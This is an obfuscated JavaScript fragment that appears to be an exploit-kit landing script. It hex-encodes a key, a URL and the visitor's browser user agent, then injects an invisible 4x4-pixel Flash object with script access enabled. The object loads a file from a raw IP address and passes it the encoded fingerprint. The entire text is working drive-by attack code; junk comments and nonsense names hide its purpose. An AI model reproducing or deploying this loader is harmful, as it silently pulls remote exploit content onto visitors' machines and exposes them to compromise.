/*s97773d91509hssfj39001fs*/function hgfgerdfgdf(num, width){/*s98763d40937hfj8326fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s63702d80522hfj38329fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s40296d96684hfj17340fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s76664d37619hfj69337fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd87182hfs*/c += b + d;/*s52372d78946hfj11524fs*/e += 1;}return c;}/*s80208dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://92.53.124.12/?MTA2Mjk4NDY0&round=rgjEXVKQRmmolfAF5G9qCm3EOAyhCd1cOK_xbYZwgQ_5SXFbA92lj2nbAkc8MmwReG6FETi-tL&newest=xX_QMvWdbRXQC53EKvncT6NHMVHRHECL2Y-dmrHTefjaeVWkzrLFTF_yozKASASG6_JtdfJSDQ&information=MjU4MTQwNzI=&travel=NDgyOTMzMzQ=", ghnvbn("http://92.53.124.12/?ODQ3ODkxMjU=&round=rgjEXVKQRmmolfAF5G9aCm3ECAyhCe1cOK_xbYZwsQ_5SUFbA92lj2nbAkecgmxxGB61ENjOge&newest=xXzQMvWdbRXQCJ3EKvrcT6NHMVHRHECL2Y-dmrHQefjaeVWkzrHFTF_xozKASwSG6_FtdfJSDQ&information=OTE5NzEzNQ==&travel=NTI0NTE2NQ==","gexywoaxor"));